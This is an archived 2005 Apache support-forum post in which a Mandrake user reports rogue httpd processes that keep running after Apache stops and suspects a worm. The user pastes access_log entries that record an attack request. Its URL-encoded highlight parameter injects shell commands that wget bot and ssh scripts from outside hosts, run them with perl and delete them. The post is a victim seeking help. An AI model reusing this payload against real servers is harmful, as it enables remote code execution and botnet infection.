Apache Server configuration support - strange apache processes

This is Interesting: Free IT Magazines  
Home > Archive > Apache Server configuration support > January 2005 > strange apache processes





You are viewing an archived Text-only version of the thread. To view this thread in it's original format and/or if you want to reply to this thread please [click here]

Author strange apache processes
Khorne

2005-01-26, 7:55 am

Hi,


I work on apache on a mandrake 10.1 and I found that apache launch strange
processes

Normal processes under mandrake look like this:

httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2 -DHAVE_PHP4 -DHAVE_ACCESS -DHAVE ...

But few minutes after starting apache, apache launch processes like this
/usr/local/apache/bin/httpd -DSSL
/usr/local/apache/bin/httpd - D55L
/usr/local/apache/bin/httpd - D5SL

This processes don't stop when I stop apache and I can't restart apache
until I kill them.
And of course there is no httpd files under /usr/local/apache/bin/ directory

I think it's a virus or a worm.

Below is some few lines from access_log

127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
/your_server_is_infected_by_shanty.html?iID=188& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/
.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%25
54%255F%2556%2541%2552%2553%255B%2572%25
75%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 404 364 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:52:12 +0100] "GET
/?t=13714& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3b
rm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%2554%255F%2556%2541%2552%2553%255B
%2572%
2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:54:12 +0100] "GET
/?t=6& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2
520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%2554%255F%2556%2541%2552%2553%255B
%2572%2575
%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:12 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:13 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:46:30 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"


Thanks for your help,


Khorne




Sponsored Links






Free braindumps | Software forum | Database administration forum

Copyright 2003 - 2008 webservertalk.com